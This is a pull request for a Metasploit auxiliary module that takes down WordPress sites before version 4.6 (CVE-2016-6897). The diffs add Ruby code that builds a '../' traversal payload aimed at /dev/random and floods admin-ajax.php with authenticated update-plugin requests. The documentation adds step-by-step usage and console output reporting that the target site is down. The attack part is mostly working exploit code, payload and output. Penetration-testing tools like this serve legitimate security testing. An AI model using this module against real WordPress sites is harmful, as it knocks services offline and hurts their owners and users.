### PR TITLE
WordPress Directory Traversal DoS module

### DIFF
--- a/documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
+++ b/documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
@@ -1,5 +1,12 @@
-This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
-## Verification
+## Vulnerable Application
+
+This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin (https://core.trac.wordpress.org/changeset/38168) function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
+
+You can find the vulnerable application from the official website:
+https://wordpress.org/download/release-archive/
+
+
+## Verification Steps
 
 1. Start msfconsole
 2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
@@ -11,6 +18,9 @@ This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp
 8. WordPress website should be down
 
 ## Scenarios
+### Wordpress 4.5.3 on Linux Mint 17.3
+https://wordpress.org/wordpress-4.5.3.tar.gz
+
 
 ```
 msf auxiliary(wordpress_directory_traversal_dos) > exploit

--- a/documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
+++ b/documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
@@ -1,0 +1,31 @@
+This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
+## Verification
+
+1. Start msfconsole
+2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
+3. Do: ```set RHOST <ip target site>```
+4. Do: ```set TARGETURI <WordPress path>```
+5. Do: ```set USERNAME <Valid Username>```
+6. Do: ```set PASSWORD <Valid Password>```
+7. Do: ```exploit```
+8. WordPress website should be down
+
+## Scenarios
+
+```
+msf auxiliary(wordpress_directory_traversal_dos) > exploit
+
+[*] Checking if user "test" exists...
+[+] Username "test" is valid
+[*] Executing requests 1 - 5...
+[+] Finished executing requests 1 - 5
+[*] Executing requests 6 - 10...
+[+] Finished executing requests 6 - 10
+...
+[*] Executing requests 191 - 195...
+[+] Finished executing requests 191 - 195
+[*] Executing requests 196 - 200...
+[+] Finished executing requests 196 - 200
+[+] SUCCESS: /wordpress appears to be down
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(
       info,
       'Name'            => 'WordPress Traversal Directory DoS',
-      'Description'     =>  %q{Directory traversal vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress 4.5.3 allows remote authenticated users to cause a denial of service or read certain text files via a .. (dot dot) in the plugin parameter to wp-admin/admin-ajax.php, as demonstrated by /dev/random read operations that deplete the entropy pool.},
+      'Description'     =>  %q{Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by leveraging a late call to the check_ajax_referer function, a related issue to CVE-2016-6896.},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2016-6897'],
           ['EDB', '40288'],
           ['OVEID', 'OVE-20160712-0036'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6896']
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6897']
         ],
     ))
 

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -27,8 +27,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           ['CVE', '2016-6897'],
           ['EDB', '40288'],
-          ['OVEID', 'OVE-20160712-0036'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6897']
+          ['OVEID', 'OVE-20160712-0036']
         ],
     ))
 
@@ -127,11 +126,7 @@ class MetasploitModule < Msf::Auxiliary
         return
       end
 
-      path = '/'
-      1.upto(depth) do |i|
-          path += '../'
-      end
-      path += 'dev/random'
+      path = "/#{'../' * depth}dev/random"
 
       while starting_thread < rlimit do
         ubound = [rlimit - (starting_thread - 1), thread_count].min

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -11,7 +11,12 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(
       info,
       'Name'            => 'WordPress Traversal Directory DoS',
-      'Description'     =>  %q{Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by leveraging a late call to the check_ajax_referer function, a related issue to CVE-2016-6896.},
+      'Description'     =>  %q{
+        Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin
+        function in wp-admin/includes/ajax-actions.php in WordPress before 4.6
+        allows remote attackers to hijack the authentication of subscribers
+        for /dev/random read operations by leveraging a late call to
+        the check_ajax_referer function, a related issue to CVE-2016-6896.},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -32,6 +37,7 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('RLIMIT', [true, 'The number of requests to send', 200]),
         OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
         OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]),
+        OptInt.new('DEPTH', [true, 'The depth of the path', 10]),
         OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
         OptString.new('PASSWORD', [true, 'The password to send the requests with', ''])
         ])
@@ -55,6 +61,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def timeout
     datastore['TIMEOUT']
+  end
+
+  def depth
+    datastore['DEPTH']
   end
 
   def report_cred(opts)
@@ -116,6 +126,12 @@ class MetasploitModule < Msf::Auxiliary
         print_error('Aborting operation - failed to authenticate')
         return
       end
+
+      path = '/'
+      1.upto(depth) do |i|
+          path += '../'
+      end
+      path += 'dev/random'
 
       while starting_thread < rlimit do
         ubound = [rlimit - (starting_thread - 1), thread_count].min

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Auxiliary::Dos
@@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]),
         OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
         OptString.new('PASSWORD', [true, 'The password to send the requests with', ''])
-        ], self.class)
+        ])
   end
 
   def rlimit

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Auxiliary
                 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
                 'vars_post' => {
                   'action' => 'update-plugin',
-                  'plugin' => '../../../../../../../../../../dev/random'
+                  'plugin' => path
                 },
                 'cookie' => cookie
               }, timeout = 0.2)


### PR DESCRIPTION
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).


## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/dos/http/wordpress_directory_traversal_dos.rb`
- [x] `set RHOST <ip target site>`
- [x] `set TARGETURI <WordPress path>`
- [x] `set USERNAME <Valid Username>`
- [x] `set PASSWORD <Valid Password>`
- [x] `exploit`

 
## Scenarios

```
msf auxiliary(wordpress_directory_traversal_dos) > exploit

[*] Checking if user "test" exists...
[+] Username "test" is valid
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
...
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed